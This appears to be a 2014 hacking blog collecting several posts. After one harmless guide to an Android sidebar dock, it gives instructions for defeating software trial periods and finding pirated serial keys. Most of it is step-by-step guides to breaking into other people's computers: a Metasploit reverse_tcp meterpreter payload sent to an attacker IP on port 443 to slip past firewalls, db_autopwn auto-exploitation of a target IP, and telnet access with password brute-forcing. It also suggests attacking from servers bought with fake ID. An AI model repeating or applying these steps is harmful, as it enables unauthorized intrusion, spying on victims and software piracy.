Tuesday, 11 November 2014

Amazing Ubuntu Styled Sidebar Dock

Amazing Ubuntu Styled Sidebar Dock

If you are a hardcore fan of Ubuntu then you must have known that a new responsive Ubuntu OS has been designed for mobile phones and is being released soon.The best feature of the Ubuntu OS is that it has a sidebar panel or dock which allows multitasking further easier.A good news is that the Android users can now add a customized Ubuntu styled sidebar dock in their mobile phones."Glove Box" is the application that will replicate the design of the dock which was developed by a member of XDA Developer. 


Adding Ubuntu Styled Sidebar Dock in Android :

Get the GloveBox application from the playstore link(Click Here) and install it. 

You won't see any changes on your mobile until you set the application shortcuts inside the "Bar Contents" .To do so open the Glovebox application and select Bar Contents. Add your favorite applications and come back to your homescreen. (You can avoid this but homescreen gives you good visibility) 


Slide the top left of your screen and you must see the added applications in the sidebar.Hold on to your finger and move it up and down to navigate through the applications.I'm sorry you can have upto 8 applications only in free version. 

To change the place on the screen to trigger the application you must select "Configuration" and then "Edit trigger area". 


Set the desired size on the screen to trigger the sidebar.Make sure you keep minimum sensitivity level else the panel wouldn't appear. 


You can select your favorite theme for the sidebar out of the available themes.Just click on your desired theme and it's automatically added. 



The sidebar panel can be opened on any active screens and will be helpful to perform multiple tasks on your powerful android phones. 





How To Use Any Trail Software Forever In Computer And Laptop

How To Use Any Trail Software Forever In Computer And Laptop


We all know that many of the free software functions for a limited period of time and after the time period gets expired they they stop working and displaying to purchase the software. But we all want to use software for free.so just watch below.

First of all we should understand that how this software works. When we install software's for the first time, they make an entry into the Windows Registry with the details such as Installed Date and Time, installed path etc. After installation every time you run the software, it compares the current system date and time with the installed date and time. So, with this it can make out whether the trial period is expired or not.

We know that what you are thinking in this case, just change the date and time manually but this will not solve the problem.For this there is a program called RunAsData


RunAsDate is a small utility that allows you to run a program in the date and time that you specify. This utility doesn't change the current system date and time of your computer, but it only injects the date/time that you specify into the desired application.

RunAsDate intercepts the kernel API calls that returns the current date and time (GetSystemTime, GetLocalTime, GetSystemTimeAsFileTime), and replaces the current date/time with the date/time that you specify. It works with Windows 2000, XP, Wn7, 2003 and Vista.

NOTE: FOLLOW THESE TIPS CAREFULLY:

You have to follow these tips carefully to successfully hack a software and make it run in it’s trial mode forever.

  • 1. Note down the date and time, when you install the software for the first time. 
  • 2. Once the trial period expires, you must always run the software using RunAsDate. 
  • 3. After the trial period is expired, do not run the software(program) directly. If you run the software directly even once, this hack may no longer work. 
  • 4. It is better and safe to inject the date of the last day in the trial period. 



How To Find Serial Key Of Any Software ?


How To Find Serial Key Of Any Software ? 


The key 94FBR is a part of Office 2000 Pro CD activation key that is widely distributed as it bypasses the activation requirements of Office 2000 Pro. By searching for 94fbr and the product name, you are guarantee that the pages that are returned are pages dealing specifically with the product you're wanting a serial for. Follow simple steps given below to learn this trick 

Step:1. Go to Google.Com

Step:2. Then type Software Name 94FBR  

  • Replace Software Name with the name of software whose serial key you want to find 
  • Eg: To find serial key of Nero i will type Photoshop 7 94fbr 
Step:3. Now press Enter and you will find serial key of software you are looking for as shown below.



Tuesday, 4 November 2014

How to do Hacking the Internet(WAN) Not LAN Using Metasploit – The Logic

How to do Hacking the Internet(WAN) Not LAN Using Metasploit – The Logic

A few days ago there's someone put a message on my contact in this website, he asking about "is it possible to do hacking outside LAN(Local Area Network)?". When you see all of my articles, 80% of all hacking articles were written for Local Area Network, because I'm doing in my own lab, "so how about hacking outside Local Area Network?". Of course it has the same logic like when you attacking from Local Area Network :-) .

Requirement :

1. Virtual Private Server. For Backtrack 5 already installed VPSyou can view here (but you also can install yourself)
3. Cloud Server(I haven't try this :-) ) e.g : Amazon
4. Internet With Public IP
5. You can control router by yourself

Step-By-Step How to do Hacking the Internet(WAN) Not LAN Using Metasploit – The Logic:

1. Okay let's start from Virtual Private Server(VPS). This server can give you freedom to install any software you want on virtualization, because this hosting type give you flexibility to manage your server yourself (DIY) :-)
2. Dedicated Server almost doing the same like VPS(Virtual Private Server), but usually you have your own machine and then you put your machine on data center(or the service provider rent you their machine). This hosting type also allow you as user to manage your system yourself. You can do anything to your server and install anything you want to your server.
3. Cloud server –> I haven't trying this…maybe someone can share :-)
4. You have internet with public IP address… usually when you subscribe 1:1 internet bandwidth, they also give you 1 public IP.
5. Control router by ourselves to redirect incoming connection or outgoing connection.
Before we continue to next step, let's see the figure below(I will try to figure it out in simple way) :

Information(Attacker) :
– Attacker1 use local IP address –> 192.168.8.8
– Attacker1 have public IP address –> 73.67.123.85
– Attacker1 can control his router to redirect any incoming/outgoing traffic.
– Attacker2 use VPS/Dedicated/Cloud server to do an attack that connected directly to internet.
Information(Victim) :
– Victim1 have local IP address –> 192.168.1.2
– Victim2 connected to internet via router+firewall, this firewall only allowing port 80 and 443 for outgoing connection
– Victim2 connected directly to internet with IP address –> 98.87.112.89

How to Attack? :

Actually the network topology I draw above it's almost the same method to attack, you should know what is typical rules when administrator setting up a firewall(in this case is the network administrator who administer router for victim1). AFAIK they usually open specific port like :
TCP 80(Hyper Text Transfer Protocol – HTTP) –> For browsing and surfing the website
TCP 443(Secure Socket Layer – SSL) –> Secure HTTP connection or usually called HTTPS
etc(you can scan it first but be careful).
From the information above, usually attacker can create some payload and options like this :
set payload windows/meterpreter/reverse_tcp

set lhost 73.67.123.85

set lport 443
When the attack successfully launch, the payload will try to connect to IP address 73.67.123.85 with port 443. Attacker use port 443 because he know that victim1 firewall only allow port 80 and 443 for outgoing connection. If you configure the payload by using another port, the victim1 firewall will drop all unintended packet who will go through another port except 80 and 443. For the next step, attacker should configure his router to redirect all incoming traffic to port 443 to his local IP address 192.168.8.8.
You can see the tutorial about example port forwarding WRT54G router here. Actually all router will have the same option for port forwarding :-)

Update :

If you use Windows machine as a router, you can read about port forwarding tutorial here
Oops…I almost forget to explain how to do that from VPS/Dedicated/Cloud….
Actually from VPS/Dedicated/Cloud it will be more easier and also safer(maybe..LoL), because there's a lot of hacker use this service…they buy using fake ID(hit and run) and then perform an attack from its server. The logic is almost the same with I've already explained above.
You should remember that every action triggering some consequences even it's good or bad. When you doing something you should know every consequences you will get later when doing the action. Be wise :-)
Hope you found it useful.
If information I wrote here was wrong, let me know I'll correct it :-)

How to Hacking WAN Internet by Using Public Dynamic IP Address

How to Hacking WAN Internet by Using Public Dynamic IP Address

I have another request tutorial about how to set up an attack via WAN / Internet. This guy asking how to set up an attack when he only have a 3G internet modem, as you know that maybe some 3G internet modem will use a public dynamic IP address(the ip address will change dynamically).
Actually I can't write the tutorial very detailed(with screenshot) because now I didn't use the 3G modem but I already try it when I was in Indonesia, but I will try harder to make you can understand what i want to convey in this article. :-)

Requirements :

1. DynDNS account (click here to register)
2. Internet Modem with public dynamic IP address.

Step by Step :

1. Log in to your DynDNS account, then click on "Add Zone/Domain Services" (click here).
How to Hacking WAN Internet by Using Public Dynamic IP Address
2. Then the next step you need to choose the sub domain name from dyndns(because we use the free one) and then fill the rest of that form(click here)
How to Hacking WAN Internet by Using Public Dynamic IP Address


Information :
Hostname --> just fill the name you want to use.

Service type --> choose host with IP address(because you use dynamic IP).

IP Address --> In example above I'm using IP address of google.com(74.125.71.105),
but you can fill it with your own ip(see the red box) that already detected by
the system. If you still unsure about your IP, you can view how to check my public IP address.

How to hack remote computer using IP Address

How to hack remote computer using IP Address

Literally, hacking is accessing something or somebody in internet without their permission or interest. While, speaking in summary, hacking is very easy job, it is like instead of using front door, finding the hidden door of a house and hijacking the precious things. Among all the hacking, hacking via IP address is one of the most common yet powerful beginning.
You may want to hack the website and put your advertisement there or grab some database information In this type of hacking, you are playing with the web server’s computer instead of the administrator’s computer. Because, www.website.com is hosted in separate web server rather than personal computer.
Another can be accessing your friend’s computer from your home. Again this is IP based and this is possible only when your friend’s computer is online. If it is off or not connected to internet then remote IP hacking is totally impossible.
Well, both of the hacking has the same process. Let’s summarize what we must do.
  1. Confirm the website or a computer you want to hack.
  2. Find or trace their IP address.
  3. Make sure that IP address is online
  4. Scan for open ports
  5. Check for venerable ports
  6. access through the port
  7. Brute-force username and password
Now let me describe in brief in merely basic steps that a child can understand it.
First, getting the IP address of victim.
To get the IP address of the victim website, ping for it in command prompt.
For example,
ping www.google.com
will fetch the IP address of Google.com
a How to hack remote computer using IP Address
This is how we can get the IP address of the victims website.
How about your friend’s PC? You can’t do www.yourfirend’sname.com, can you? Finding your friend’s IP address is little tough job, and tougher it is if he has dynamic IP address that keeps changing.
One of the widely used method to detect IP address of your friend is by chatting with him.
You might find this article helpful
Now you got the IP address right? Is it online?
To know the online status just ping the IP address, if it is online it will reply.
If the IP address is online, scan for the open ports. Open ports are like closed door without locks, you can go inside and outside easily.
Use Advanced Port Scanner to scan all open and venerable ports.
b How to hack remote computer using IP Address
Now you’ve IP address and open port address of the victim, you can now use telnet to try to access them. Make sure that you’ve telnet enabled in your computer or install it from Control panel > Add remove programs > add windows components.
Now open command prompt and use telnet command to access to the IP address. Use following syntax for connection.
telnet [IP address] [Port]
c How to hack remote computer using IP Address
You’ll be asked to input login information.
d How to hack remote computer using IP Address
If you can guess the informations easily then it’s OK. Or you can use some brute-forcing tools like this one.
In this way you’ll able to hack remove computer using only IP address

Hack Any PC Using IP Via Metasploit

Hack Any PC Using IP Via Metasploit 


Usually whenever you are thinking to do some stuff with your friend's computer or maybe your colleague’s laptop without a physical contact with his/her things that may seem a little bit impossible.
But with the help of the Metasploit feature you can even fully control his entire network or computer by just having his/her computer’s IP address and a few steps which I will shortly guide you through.

It's really important and highly recommended to have a basic knowledge about coding specially on CMD and Linux environments like Red Hat Linux or the other available distros. Well for this moment I will consider that you have the recommended skills to do the real hacking, just follow  me up.

1    1.)    First you need to download Metasploit. The most up-to-date version is FREE at metasploit.com.

2.) You need PostgrSQL for your database.
Download here:http://www.postgresql.org/
Make sure you use all the defaults or Metasploit won't work!

3.) Now lets get down to buisness... After installing both tools, open up the PostgrSQL admin gui (start -> all programs -> PostgreSQL 9.0 -> pgAdmin III).
Then right-click on your server (in the left hand box) and click connect. Remember to keep this window open the whole time. You will also need the pass you chose to use in step 5...

4.) Time for some hacking! Go to start -> all programs -> Metasploit Framework, and then open the Metasploit GUI.

5.)Now, in the window type:

db_connect postgres:ThePassYouChose@localhost:5432

The first time you do this you will see lots of text flash buy. Don't worry, this is normal.

6.) Type db_host to make sure you are connected correctly.

7.)Now type this:

db_nmap 000.000.000.000

Make sure you put the ip of the computer you are trying to hack in the place of 000.000.000.000...

8.) Now we get to the fun part; the automatic exploitation.
Just type db_autopwn -t -p -e -s -b ,
Watch the auto-exploitation start, go play Halo for a while, and then come back...

9.) After the exploitation is done, type sessions -l to see what the scanner found. If all went well, you should see a list of exploits.

10.) Now we get to use the exploits to hack the computer! If you will notice, all of the exploits are numbered, and they all have obvious names (i. e., reverseScreen_tcp). In order to use an exploit, type this:

Sessions -i ExploitNumber

The features of Metasploit are much like a rat. Once you get into someone's computer, you can see their screen, control their mouse, see what they type, see them, etc.

Hack a Computer Only with just a IP Address in Easy steps

Hack a Computer Only with just a IP Address in Easy steps:


Steps to Hack IP Address:


1) Prepare the IP address of the Victim. (e.g : 101.23.53.70 ) 


2) Download and Install Advanced Port Scanner.


3) Open Advanced Port Scanner and Type the IP Address in the right column and Click Scan.
4) It will lists you all Opened Ports of the Victim’s PC or Router. (e.g : Port 91 )
 
5) After retrieving the IP address and the Opened Ports of the Victim, Open Command Prompt (CMD)
 
and Type: telnet [IP ADDRESS] [PORT]
 
e.g : telnet 101.23.53.70  91
 
6) Now you’ll be asked to Enter Login Information, Just type Username and Password and hit Enter.
If no password is used just type the Username.

Done! Now you’ll get access to all Victim’s Files and Documents by browsing with CMD (use cd, copy, delete, mv… to do all tricks.)


Enjoy :)